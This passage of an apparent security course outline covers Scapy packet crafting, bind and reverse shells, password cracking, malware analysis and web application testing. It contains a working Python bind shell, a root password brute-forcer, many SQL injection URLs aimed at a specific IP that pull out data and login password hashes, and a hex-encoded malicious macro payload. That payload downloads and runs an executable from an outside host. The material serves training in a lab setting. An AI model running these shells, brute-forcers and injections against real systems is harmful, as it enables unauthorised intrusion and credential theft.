1899
1900
1901
1902
1903
1904		#!/usr/bin/python
1905		# udpclient.py
1906
1907		import socket
1908
1909		s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
1910		hostport = ("127.0.0.1", 1337)
1911		s.sendto("Hello\n", hostport)
1912		buf = s.recv(1024)
1913		print buf
1914
1915
1916
1917
1918
1919
1920
1921
1922
1923		vi udpserver.py
1924
1925
1926
1927
1928
1929
1930		#!/usr/bin/python
1931		# udpserver.py
1932
1933		import socket
1934
1935		s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
1936		hostport = ("127.0.0.1", 1337)
1937		s.bind(hostport)
1938		while 1:
1939		buf, address = s.recvfrom(1024)
1940		print buf
1941		if buf == "Hello\n":
1942		s.sendto("Server ID 1\n", address)
1943
1944
1945
1946
1947
1948
1949		python udpserver.py
1950
1951
1952		--open another terminal--
1953		python udpclient.py
1954
1955
1956
1957
1958
1959
1960		###############################
1961		# Lesson 20: Installing Scapy #
1962		###############################
1963
1964		sudo apt-get update
1965		sudo apt-get install python-scapy python-pyx python-gnuplot
1966
1967
1968		Reference Page For All Of The Commands We Will Be Running:
1969		http://samsclass.info/124/proj11/proj17-scapy.html
1970
1971		Great slides for Scapy:
1972		http://www.secdev.org/conf/scapy_csw05.pdf
1973
1974
1975
1976
1977		To run Scapy interactively
1978
1979		sudo scapy
1980
1981
1982
1983		################################################
1984		# Lesson 21: Sending ICMPv4 Packets with scapy #
1985		################################################
1986
1987		In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:
1988
1989		i = IP()
1990
1991
1992
1993
1994		This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
1995
1996		i.display()
1997
1998
1999
2000
2001		Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
2002
2003		i.dst="10.65.75.49"
2004
2005		i.display()
2006
2007
2008
2009
2010		Notice that scapy automatically fills in your machine's source IP address.
2011
2012		Use these commands to create an object named ic of type ICMP and display its properties:
2013
2014
2015		ic = ICMP()
2016
2017		ic.display()
2018
2019
2020
2021
2022
2023		Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
2024
2025		sr1(i/ic)
2026
2027
2028
2029
2030
2031		This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply.
2032
2033		The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.
2034
2035		Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):
2036
2037
2038		sr1(i/ic/"YOUR NAME")
2039
2040
2041		You should see a reply with a Raw section containing your name.
2042
2043
2044
2045		##############################################
2046		# Lesson 22: Sending a UDP Packet with Scapy #
2047		##############################################
2048
2049
2050		Preparing the Target
2051		$ ncat -ulvp 4444
2052
2053
2054
2055
2056		--open another terminal--
2057		In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:
2058
2059		u = UDP()
2060
2061		u.display()
2062
2063
2064
2065		This creates an object named u of type UDP, and displays its properties.
2066
2067		Execute these commands to change the destination port to 4444 and display the properties again:
2068
2069		i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
2070
2071		u.dport = 4444
2072
2073		u.display()
2074
2075
2076
2077		Execute this command to send the packet to the Windows machine:
2078
2079		send(i/u/"YOUR NAME SENT VIA UDP\n")
2080
2081
2082
2083		On the Windows target, you should see the message appear
2084
2085
2086
2087
2088		#######################################
2089		# Lesson 23: Ping Sweeping with Scapy #
2090		#######################################
2091
2092
2093
2094		#!/usr/bin/python
2095		from scapy.all import *
2096
2097		TIMEOUT = 2
2098		conf.verb = 0
2099		for ip in range(0, 256):
2100		packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
2101		# You will need to change 10.10.30 above this line to the subnet for your network
2102		reply = sr1(packet, timeout=TIMEOUT)
2103		if not (reply is None):
2104		print reply.dst, "is online"
2105		else:
2106		print "Timeout waiting for %s" % packet[IP].dst
2107
2108
2109
2110		###############################################
2111		# Checking out some scapy based port scanners #
2112		###############################################
2113
2114		wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py
2115
2116		cat rdp_scan.py
2117
2118		sudo python rdp_scan.py
2119
2120
2121		######################################
2122		# Dealing with conf.verb=0 NameError #
2123		######################################
2124
2125		conf.verb = 0
2126		NameError: name 'conf' is not defined
2127
2128		Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:
2129
2130		from scapy import *
2131		to
2132		from scapy.all import *
2133
2134
2135
2136		Reference:
2137		http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html
2138
2139
2140		conf.verb=0 is a verbosity setting (configuration/verbosity = conv
2141
2142
2143
2144		Here are some good Scapy references:
2145		http://www.secdev.org/projects/scapy/doc/index.html
2146		http://resources.infosecinstitute.com/port-scanning-using-scapy/
2147		http://www.hackerzvoice.net/ouah/blackmagic.txt
2148		http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html
2149
2150
2151		######################################
2152		# Lesson 24: Bind and Reverse Shells #
2153		######################################
2154		vi simplebindshell.py
2155
2156
2157		#!/bin/python
2158		import os,sys,socket
2159
2160		ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
2161		print '-Creating socket..'
2162		port = 31337
2163		try:
2164		ls.bind(('', port))
2165		print '-Binding the port on '
2166		ls.listen(1)
2167		print '-Listening, '
2168		(conn, addr) = ls.accept()
2169		print '-Waiting for connection...'
2170		cli= conn.fileno()
2171		print '-Redirecting shell...'
2172		os.dup2(cli, 0)
2173		print 'In, '
2174		os.dup2(cli, 1)
2175		print 'Out, '
2176		os.dup2(cli, 2)
2177		print 'Err'
2178		print 'Done!'
2179		arg0='/bin/sh'
2180		arg1='-a'
2181		args=[arg0]+[arg1]
2182		os.execv(arg0, args)
2183		except(socket.error):
2184		print 'fail\n'
2185		conn.close()
2186		sys.exit(1)
2187
2188
2189
2190
2191
2192
2193
2194		nc TARGETIP 31337
2195
2196
2197
2198		---------------------
2199		Preparing the target for a reverse shell
2200		$ ncat -lvp 4444
2201
2202
2203
2204		--open another terminal--
2205		wget https://www.trustedsec.com/files/simple_py_shell.py
2206
2207		vi simple_py_shell.py
2208
2209
2210
2211
2212
2213
2214		-------------------------------
2215		Tricky shells
2216
2217		Reference:
2218		http://securityweekly.com/2011/10/python-one-line-shell-code.html
2219		http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
2220
2221
2222
2223
2224
2225
2226		#############################
2227		# Reference Videos To Watch #
2228		#############################
2229		Here is your third set of youtube videos that I'd like for you to watch:
2230		https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30)
2231
2232
2233
2234
2235		#################################################
2236		# Lesson 25: Python Functions & String Handling #
2237		#################################################
2238
2239		Python can make use of functions:
2240		http://www.tutorialspoint.com/python/python_functions.htm
2241
2242
2243
2244		Python can interact with the 'crypt' function used to create Unix passwords:
2245		http://docs.python.org/2/library/crypt.html
2246
2247
2248
2249		Tonight we will see a lot of the split() method so be sure to keep the following references close by:
2250		http://www.tutorialspoint.com/python/string_split.htm
2251
2252
2253		Tonight we will see a lot of slicing so be sure to keep the following references close by:
2254		http://techearth.net/python/index.php5?title=Python:Basics:Slices
2255
2256
2257
2258
2259
2260		################################
2261		# Lesson 26: Password Cracking #
2262		################################
2263
2264		wget https://s3.amazonaws.com/SecureNinja/Python/htcrack.py
2265
2266		vi htcrack.py
2267
2268		vi list.txt
2269
2270		hello
2271		goodbye
2272		red
2273		blue
2274		yourname
2275		tim
2276		bob
2277
2278
2279		htpasswd -nd yourname
2280		- enter yourname as the password
2281
2282
2283
2284		python htcrack.py joe:7XsJIbCFzqg/o list.txt
2285
2286
2287
2288
2289		sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc
2290
2291		rm -rf mechanize-0.2.5.tar.gz
2292
2293		sudo /bin/bash
2294
2295		passwd
2296		*set root password*
2297
2298
2299
2300
2301		vi rootbrute.py
2302
2303
2304		#!/usr/bin/env python
2305
2306		import sys
2307		try:
2308		import pexpect
2309		except(ImportError):
2310		print "\nYou need the pexpect module."
2311		print "http://www.noah.org/wiki/Pexpect\n"
2312		sys.exit(1)
2313
2314		#Change this if needed.
2315		# LOGIN_ERROR = 'su: incorrect password'
2316		LOGIN_ERROR = "su: Authentication failure"
2317
2318		def brute(word):
2319		print "Trying:",word
2320		child = pexpect.spawn('/bin/su')
2321		child.expect('Password: ')
2322		child.sendline(word)
2323		i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
2324		if i == 1:
2325		print "Incorrect Password"
2326
2327		if i == 2:
2328		print "\n\t[!] Root Password:" ,word
2329		child.sendline ('id')
2330		print child.before
2331		child.interact()
2332
2333		if len(sys.argv) != 2:
2334		print "\nUsage : ./rootbrute.py <wordlist>"
2335		print "Eg: ./rootbrute.py words.txt\n"
2336		sys.exit(1)
2337
2338		try:
2339		words = open(sys.argv[1], "r").readlines()
2340		except(IOError):
2341		print "\nError: Check your wordlist path\n"
2342		sys.exit(1)
2343
2344		print "\n[+] Loaded:",len(words),"words"
2345		print "[+] BruteForcing...\n"
2346		for word in words:
2347		brute(word.replace("\n",""))
2348
2349
2350
2351
2352		References you might find helpful:
2353		http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python
2354
2355
2356
2357
2358
2359
2360
2361
2362
2363		wget https://s3.amazonaws.com/SecureNinja/Python/md5crack.py
2364
2365		vi md5crack.py
2366
2367
2368
2369
2370
2371
2372		Why use hexdigest
2373		http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string
2374
2375
2376
2377
2378		http://md5online.net/
2379
2380
2381
2382
2383
2384
2385
2386		wget https://s3.amazonaws.com/SecureNinja/Python/wpbruteforcer.py
2387
2388
2389
2390
2391		#############################
2392		# Reference Videos To Watch #
2393		#############################
2394		Here is your forth set of youtube videos that I'd like for you to watch:
2395		https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40)
2396
2397
2398
2399
2400
2401
2402
2403
2404		###############################
2405		# Lesson 28: Malware Analysis #
2406		###############################
2407
2408
2409
2410
2411		############################
2412		# Download the Analysis VM #
2413		############################
2414		https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
2415		user: infosecaddicts
2416		pass: infosecaddicts
2417
2418
2419		- Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
2420
2421		- After logging please open a terminal window and type the following commands:
2422
2423		cd Desktop/
2424
2425
2426		- This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
2427
2428		wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
2429		wget https://s3.amazonaws.com/StrategicSec-Files/analyse_malware.py
2430
2431		unzip malware-password-is-infected.zip
2432		infected
2433
2434		file malware.exe
2435
2436		mv malware.exe malware.pdf
2437
2438		file malware.pdf
2439
2440		mv malware.pdf malware.exe
2441
2442		hexdump -n 2 -C malware.exe
2443
2444		*What is '4d 5a' or 'MZ'*
2445		Reference:
2446		http://www.garykessler.net/library/file_sigs.html
2447
2448
2449		objdump -x malware.exe
2450
2451		strings malware.exe
2452
2453		strings --all malware.exe \| head -n 6
2454
2455		strings malware.exe \| grep -i dll
2456
2457		strings malware.exe \| grep -i library
2458
2459		strings malware.exe \| grep -i reg
2460
2461		strings malware.exe \| grep -i hkey
2462
2463		strings malware.exe \| grep -i hku
2464
2465		- We didn't see anything like HKLM, HKCU or other registry type stuff
2466
2467		strings malware.exe \| grep -i irc
2468
2469		strings malware.exe \| grep -i join
2470
2471		strings malware.exe \| grep -i admin
2472
2473		strings malware.exe \| grep -i list
2474
2475
2476		- List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
2477
2478		sudo apt-get install -y python-pefile
2479
2480		vi analyse_malware.py
2481
2482		python analyse_malware.py malware.exe
2483
2484
2485
2486
2487		Building a Malware Scanner
2488		--------------------------
2489
2490		mkdir ~/Desktop/malwarescanner
2491
2492		cd ~/Desktop/malwarescanner
2493
2494		wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
2495
2496		unzip master.zip
2497
2498		cd malwarescanner-master/
2499
2500		python scanner.py -h
2501
2502		cat strings.txt
2503
2504		cat hashes.txt
2505
2506		mkdir ~/Desktop/malcode
2507
2508		cp ~/Desktop/malware.exe ~/Desktop/malcode
2509
2510		python scanner.py -H hashes.txt -D /home/malware/Desktop/malcode/ strings.txt
2511
2512		cp ~/Desktop/
2513
2514
2515
2516		#####################################################
2517		# Analyzing Macro Embedded Malware #
2518		# Reference: #
2519		# https://jon.glass/analyzes-dridex-malware-p1/ #
2520		#####################################################
2521		cp ~/Desktop/
2522
2523		- Create a FREE account on:
2524		https://malwr.com/account/signup/
2525
2526		- Grab the malware from:
2527		https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/
2528
2529		file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
2530
2531		cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
2532
2533
2534
2535
2536		sudo pip install olefile
2537
2538		mkdir ~/Desktop/oledump
2539
2540		cd ~/Desktop/oledump
2541
2542		wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
2543
2544		unzip oledump_V0_0_22.zip
2545
2546		cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
2547
2548		mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
2549
2550		python oledump.py 064016.doc
2551
2552		python oledump.py 064016.doc -s A4 -v
2553
2554		- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
2555		- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
2556
2557
2558		python oledump.py 064016.doc -s A5 -v
2559
2560		- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
2561
2562
2563		python oledump.py 064016.doc -s A3 -v
2564
2565		- Look for "GVhkjbjv" and you should see:
2566
2567		636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
2568
2569		- Take that long blob that starts with 636D and finishes with 653B and paste it in:
2570		http://www.rapidtables.com/convert/number/hex-to-ascii.htm
2571
2572
2573
2574
2575		##############
2576		# Yara Ninja #
2577		##############
2578		cd ~/Desktop
2579
2580		sudo apt-get remove -y yara
2581
2582		wget https://github.com/plusvic/yara/archive/v3.4.0.zip
2583
2584		sudo apt-get -y install libtool
2585
2586		unzip v3.4.0.zip
2587
2588		cd yara-3.4.0
2589
2590		./bootstrap.sh
2591
2592		./configure
2593
2594		make
2595
2596		sudo make install
2597
2598		yara -v
2599
2600		cd ..
2601
2602		wget https://github.com/Yara-Rules/rules/archive/master.zip
2603
2604		unzip master.zip
2605
2606		cd ~/Desktop
2607
2608		yara rules-master/packer.yar malcode/malware.exe
2609
2610
2611		Places to get more Yara rules:
2612		------------------------------
2613		https://malwareconfig.com/static/yaraRules/
2614		https://github.com/kevthehermit/YaraRules
2615		https://github.com/VectraThreatLab/reyara
2616
2617
2618
2619		Yara rule sorting script:
2620		-------------------------
2621		https://github.com/mkayoh/yarasorter
2622
2623
2624
2625		cd ~/Desktop/rules-master
2626		for i in $( ls --hide=master.yar ); do echo include \"$i\";done > master.yar
2627		cd ~/Desktop/
2628		yara rules-master/master.yar malcode/malware.exe
2629
2630
2631
2632
2633
2634
2635
2636
2637
2638
2639		Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
2640		http://derekmorton.name/files/malware_12-14-12.sql.bz2
2641
2642
2643		Malware Repositories:
2644		http://malshare.com/index.php
2645		http://www.malwareblacklist.com/
2646		http://www.virusign.com/
2647		http://virusshare.com/
2648		http://www.tekdefense.com/downloads/malware-samples/
2649
2650
2651
2652
2653		###############################
2654		# Creating a Malware Database #
2655		###############################
2656
2657		Creating a malware database (sqlite)
2658		------------------------------------
2659		sudo apt-get install -y python-simplejson python-simplejson-dbg
2660		wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
2661		wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
2662		unzip malware-password-is-infected.zip
2663		infected
2664		python avsubmit.py --init
2665		python avsubmit.py -f malware.exe -e
2666
2667
2668
2669
2670
2671		Creating a malware database (mysql)
2672		-----------------------------------
2673		- Step 1: Installing MySQL database
2674		- Run the following command in the terminal:
2675
2676		sudo apt-get install mysql-server
2677
2678		- Step 2: Installing Python MySQLdb module
2679		- Run the following command in the terminal:
2680
2681		sudo apt-get build-dep python-mysqldb
2682		sudo apt-get install python-mysqldb
2683
2684		Step 3: Logging in
2685		Run the following command in the terminal:
2686
2687		mysql -u root -p (set a password of 'malware')
2688
2689		- Then create one database by running following command:
2690
2691		create database malware;
2692
2693		exit;
2694
2695		wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
2696
2697		vi mal_to_db.py (fill in database connection information)
2698
2699		python mal_to_db.py -i
2700
2701		python mal_to_db.py -f malware.exe -u
2702
2703
2704		mysql -u root -p
2705		malware
2706
2707		mysql> use malware;
2708
2709		select id,md5,sha1,sha256,time FROM files;
2710
2711		mysql> quit;
2712
2713
2714
2715
2716		######################################
2717		# PCAP Analysis with forensicPCAP.py #
2718		######################################
2719		cd ~/Desktop
2720		wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
2721		sudo easy_install cmd2
2722
2723		python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
2724
2725		ForPCAP >>> help
2726
2727
2728		Prints stats about PCAP
2729		ForPCAP >>> stat
2730
2731
2732		Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
2733		ForPCAP >>> dns
2734
2735		ForPCAP >>> show
2736
2737
2738		Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
2739		ForPCAP >>> dstports
2740
2741		ForPCAP >>> show
2742
2743
2744		Prints the number of ip source and store them.
2745		ForPCAP >>> ipsrc
2746
2747
2748		Prints the number of web's requests and store them
2749		ForPCAP >>> web
2750
2751
2752		Prints the number of mail's requests and store them
2753		ForPCAP >>> mail
2754
2755
2756
2757		###################
2758		# Memory Analysis #
2759		###################
2760		cd /home/malware/Desktop/Banking\ Troubles/Volatility
2761
2762		python volatility
2763		python volatility pslist -f ../hn_forensics.vmem
2764		python volatility connscan2 -f ../hn_forensics.vmem
2765		python volatility memdmp -p 888 -f ../hn_forensics.vmem
2766		python volatility memdmp -p 1752 -f ../hn_forensics.vmem
2767		*Takes a few min*
2768		strings 1752.dmp \| grep "^http://" \| sort \| uniq
2769		strings 1752.dmp \| grep "Ahttps://" \| uniq -u
2770		cd ..
2771		foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
2772		cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
2773		cat audit.txt
2774		cd pdf
2775		ls
2776		grep -i javascript *.pdf
2777
2778
2779
2780		cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
2781		wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
2782		unzip pdf-parser_V0_6_4.zip
2783		python pdf-parser.py -s javascript --raw 00600328.pdf
2784		python pdf-parser.py --object 11 00600328.pdf
2785		python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
2786
2787		cat malicious.js
2788
2789
2790		***Sorry - no time to cover javascript de-obfuscation today***
2791
2792
2793		cd /home/malware/Desktop/Banking\ Troubles/Volatility/
2794		python volatility files -f ../hn_forensics.vmem > files
2795		cat files \| less
2796		python volatility malfind -f ../hn_forensics.vmem -d out
2797		ls out/
2798		python volatility hivescan -f ../hn_forensics.vmem
2799		python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
2800		for file in $(ls *.dmp); do echo $file; strings $file \| grep bankofamerica; done
2801
2802
2803
2804		Start with simple Firefox Addons:
2805
2806		- ShowIP https://addons.mozilla.org/en-US/firefox/addon/showip/
2807		- Server Spy https://addons.mozilla.org/en-US/firefox/addon/server-spy/
2808		- FoxyProxy https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
2809		- Tamper Data https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
2810		- Wapalyzer https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
2811
2812		A good list of web app testing add ons for Firefox:
2813		https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/
2814
2815
2816
2817
2818
2819
2820
2821		##################################
2822		# Basic: Web Application Testing #
2823		##################################
2824
2825		Most people are going to tell you reference the OWASP Testing guide.
2826		https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
2827
2828		I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
2829
2830
2831		The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
2832
2833		1. Does the website talk to a DB?
2834		- Look for parameter passing (ex: site.com/page.php?id=4)
2835		- If yes - try SQL Injection
2836
2837		2. Can I or someone else see what I type?
2838		- If yes - try XSS
2839
2840		3. Does the page reference a file?
2841		- If yes - try LFI/RFI
2842
2843		Let's start with some manual testing against 54.149.82.150
2844
2845
2846		Start here:
2847		http://54.149.82.150/
2848
2849
2850		There's no parameter passing on the home page so the answer to question 1 is NO.
2851		There is however a search box in the top right of the webpage, so the answer to question 2 is YES.
2852
2853		Try an XSS in the search box on the home page:
2854		<script>alert(123);</script>
2855
2856		Doing this gives us the following in the address bar:
2857		http://54.149.82.150/BasicSearch.aspx?Word=<script>alert(123);</script>
2858
2859		Ok, so we've verified that there is XSS in the search box.
2860
2861		Let's move on to the search box in the left of the page.
2862
2863		Let's give the newsletter signup box a shot
2864
2865		Moving on to the login page.
2866		http://54.149.82.150/login.aspx
2867
2868		I entered a single quote (') for both the user name and the password. I got the following error:
2869
2870		-----------------------------------------------------------------
2871		'Users//User[@Name=''' and @Password=''']' has an invalid token.
2872		Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
2873
2874		Exception Details: System.Xml.XPath.XPathException: 'Users//User[@Name=''' and @Password=''']' has an invalid token.
2875
2876		Source Error:
2877
2878
2879		Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
2880		Line 113: string credential = "Users//User[@Name='" + UserName + "' and @Password='" + Password + "']";
2881		Line 114: XmlNodeList xmln = doc.SelectNodes(credential);
2882		Line 115: //String test = xmln.ToString();
2883		Line 116: if (xmln.Count > 0)
2884
2885		-----------------------------------------------------------------
2886
2887
2888		Hmm....System.Xml.XPath.XPathException.....that's not SQL.
2889
2890		WTF is this:
2891		Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
2892
2893
2894
2895
2896		In this case you'll have the trap the request with a proxy like:
2897		- Firefox Tamper Data
2898		- Burp Suite http://www.portswigger.net/Burp/proxy.html
2899		- WebScarab https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
2900		- Rat Proxy https://code.google.com/p/ratproxy/
2901		- Zap Proxy https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
2902		- Paros http://sourceforge.net/projects/paros/
2903
2904
2905
2906		Let's go back to that page error message.....
2907
2908
2909		Let's check it out:
2910		http://54.149.82.150/AuthInfo.xml
2911
2912		Looks like we found passwords!!!!!!!!!!
2913
2914
2915		Looks like there no significant new functionality after logging in with the stolen credentials.
2916
2917		Going back to the homepage...let's see if we can see anything. Figured I'd click on one of the links
2918
2919
2920		http://54.149.82.150/bookdetail.aspx?id=2
2921
2922
2923		Ok, there is parameter passing (bookdetail.aspx?id=2).
2924
2925		The page name is: bookdetail.aspx
2926		The parameter name is: id
2927		The paramber value is: 2
2928
2929
2930		Let's try throwing a single quote (') in there:
2931
2932		http://54.149.82.150/bookdetail.aspx?id=2'
2933
2934
2935		I get the following error:
2936
2937		Unclosed quotation mark after the character string ''.
2938		Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
2939
2940		Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
2941
2942
2943
2944
2945
2946
2947
2948
2949
2950
2951		#############################################################################
2952		# SQL Injection #
2953		# https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx #
2954		#############################################################################
2955
2956
2957		- Another quick way to test for SQLI is to remove the paramter value
2958
2959
2960		#############################
2961		# Error-Based SQL Injection #
2962		#############################
2963		http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
2964		http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
2965		http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
2966		http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
2967		http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
2968		http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
2969		http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
2970		http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
2971		http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
2972
2973
2974
2975
2976		#############################
2977		# Union-Based SQL Injection #
2978		#############################
2979		http://54.149.82.150/bookdetail.aspx?id=2 order by 100--
2980		http://54.149.82.150/bookdetail.aspx?id=2 order by 50--
2981		http://54.149.82.150/bookdetail.aspx?id=2 order by 25--
2982		http://54.149.82.150/bookdetail.aspx?id=2 order by 10--
2983		http://54.149.82.150/bookdetail.aspx?id=2 order by 5--
2984		http://54.149.82.150/bookdetail.aspx?id=2 order by 6--
2985		http://54.149.82.150/bookdetail.aspx?id=2 order by 7--
2986		http://54.149.82.150/bookdetail.aspx?id=2 order by 8--
2987		http://54.149.82.150/bookdetail.aspx?id=2 order by 9--
2988		http://54.149.82.150/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
2989
2990		We are using a union select statement because we are joining the developer's query with one of our own.
2991		Reference:
2992		http://www.techonthenet.com/sql/union.php
2993		The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
2994		It removes duplicate rows between the various SELECT statements.
2995
2996		Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
2997
2998		http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
2999
3000		Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
3001
3002		http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
3003		http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
3004		http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
3005		http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
3006
3007
3008
3009
3010
3011		- Another way is to see if you can get the backend to perform an arithmetic function
3012		http://54.149.82.150/bookdetail.aspx?id=(2)
3013		http://54.149.82.150/bookdetail.aspx?id=(4-2)
3014		http://54.149.82.150/bookdetail.aspx?id=(4-1)
3015
3016
3017
3018		http://54.149.82.150/bookdetail.aspx?id=2 or 1=1--
3019		http://54.149.82.150/bookdetail.aspx?id=2 or 1=2--
3020		http://54.149.82.150/bookdetail.aspx?id=1*1
3021		http://54.149.82.150/bookdetail.aspx?id=2 or 1 >-1#
3022		http://54.149.82.150/bookdetail.aspx?id=2 or 1<99#
3023		http://54.149.82.150/bookdetail.aspx?id=2 or 1<>1#
3024		http://54.149.82.150/bookdetail.aspx?id=2 or 2 != 3--
3025		http://54.149.82.150/bookdetail.aspx?id=2 &0#
3026
3027
3028
3029
3030
3031		###############################
3032		# Blind SQL Injection Testing #
3033		###############################
3034		Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
3035
3036		3 - Total Characters
3037		http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
3038		http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
3039		http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
3040
3041		Let's go for a quick check to see if it's DBO
3042		http://54.149.82.150/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
3043
